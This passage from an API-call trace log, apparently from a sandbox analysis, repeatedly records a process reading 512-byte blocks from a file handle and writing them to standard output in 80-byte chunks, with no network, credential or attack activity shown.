lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.853] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.853] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.854] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.854] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.855] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.855] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.856] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.856] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.857] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.858] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.858] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.859] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.859] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.860] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, 